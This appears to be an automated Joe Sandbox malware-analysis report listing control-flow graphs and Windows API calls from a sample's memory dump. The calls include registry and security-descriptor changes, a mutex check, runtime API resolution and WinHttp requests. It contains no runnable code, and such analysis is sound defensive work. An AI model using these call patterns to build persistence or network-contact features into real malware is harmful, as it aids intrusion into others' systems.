                  control_flow_graph 955 1ed020-1ed029 956 1ed030-1ed036 955->956 957 1ed02b-1ed02f 955->957 958 1ed0c1-1ed0c6 956->958 959 1ed03c-1ed045 lstrlenW 956->959 959->958 960 1ed047-1ed081 RegOpenKeyExW * 2 959->960 961 1ed083-1ed0a0 RegOpenKeyExW 960->961 962 1ed0a6 960->962 961->962 964 1ed0a2-1ed0a4 961->964 963 1ed0a8-1ed0c0 962->963 964->963
                  APIs
                  • lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
                  • RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
                  • RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
                  • RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 001EF33E
                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 001EF352
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF38E
                    • Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 985 1e35e0-1e3626 call 1e91c0 ConvertStringSecurityDescriptorToSecurityDescriptorW 988 1e3628-1e362d 985->988 989 1e362f 985->989 990 1e3632-1e3674 call 1ef320 CreateMutexW 988->990 989->990 993 1e3676-1e3682 990->993 994 1e3685-1e368a 990->994 993->994 995 1e368c-1e368e ExitProcess 994->995 996 1e3694-1e36ad 994->996
                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622
                    • Part of subcall function 001EF320: memset.MSVCRT ref: 001EF33E
                    • Part of subcall function 001EF320: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 001EF352
                    • Part of subcall function 001EF320: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF38E
                  • CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
                  • ExitProcess.KERNEL32 ref: 001E368E
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001F29D8
                    • Part of subcall function 001F2870: StrChrW.SHLWAPI(?,0000005C), ref: 001F28A3
                    • Part of subcall function 001F2870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F28B8
                    • Part of subcall function 001F2870: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001F28DD
                    • Part of subcall function 001F2870: StrChrW.SHLWAPI(?,0000005C), ref: 001F2906
                    • Part of subcall function 001F2870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F2921
                    • Part of subcall function 001F2870: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 001F2946
                    • Part of subcall function 001F2870: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 001F2962
                  • memset.MSVCRT ref: 001F2A05
                  • StrStrW.SHLWAPI(?,001F424C), ref: 001F2A22
                    • Part of subcall function 001EF8B0: memset.MSVCRT ref: 001EF8E0
                    • Part of subcall function 001EF8B0: memcpy.MSVCRT ref: 001EF8EB
                  • memset.MSVCRT ref: 001F2A47
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • memset.MSVCRT ref: 001EF8E0
                  • memcpy.MSVCRT ref: 001EF8EB
                    • Part of subcall function 001E98F0: RegCreateKeyExW.KERNEL32(00000000,80000002,00000000,00000000,00000000,00020106,00000000,00000000,00000000,00000000), ref: 001E993A
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001ED020: lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E3EB7
                  • memset.MSVCRT ref: 001E3ECD
                    • Part of subcall function 001EF4D0: LoadLibraryW.KERNEL32(?), ref: 001EF4F8
                    • Part of subcall function 001EF4D0: GetProcAddress.KERNEL32(001E3EF7,?), ref: 001EF52D
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1
                  • ExitProcess.KERNEL32 ref: 001F0706
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001ED020: lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
                    • Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C
                  • RegCreateKeyExW.KERNEL32(00000000,80000002,00000000,00000000,00000000,00020106,00000000,00000000,00000000,00000000), ref: 001E993A
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • LoadLibraryW.KERNEL32(?), ref: 001EF4F8
                  • GetProcAddress.KERNEL32(001E3EF7,?), ref: 001EF52D
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Non-executed Functions

                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EC4E2
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EC505
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EC528
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EC54B
                  • GetLastError.KERNEL32 ref: 001EC6BB
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EFC4F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EFC72
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EFC95
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EFCB8
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001E7208
                  • GetCurrentProcessId.KERNEL32 ref: 001E7214
                  • GetCurrentThreadId.KERNEL32 ref: 001E721C
                  • GetTickCount.KERNEL32 ref: 001E7224
                  • QueryPerformanceCounter.KERNEL32(?), ref: 001E7230
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001EDD4D
                  • UnhandledExceptionFilter.KERNEL32(001F6DB8), ref: 001EDD58
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 001EDD63
                  • TerminateProcess.KERNEL32(00000000), ref: 001EDD6A
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                    • Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52
                  • GetLastError.KERNEL32 ref: 001E26BD
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • memcpy.MSVCRT ref: 001E77B9
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • GetProcAddress.KERNEL32(00000000), ref: 001E4AC4
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                    • Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001E7292
                  • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,?,001F04FF), ref: 001E72B7
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E734E
                  • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,001ED31E,?,001F04FB,?,?,?,?,001F04FF), ref: 001E737B
                  • WinHttpConnect.WINHTTP(00000000,001ED31E,00000000,00000000,?,001F04FB,?,?,?,?,001F04FF), ref: 001E738A
                  • WinHttpOpenRequest.WINHTTP(00000000,?,?,00000000,00000000,00000000,00800000,?,?,?,?,?,001F04FB), ref: 001E73EB
                  • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,001F04FB), ref: 001E7408
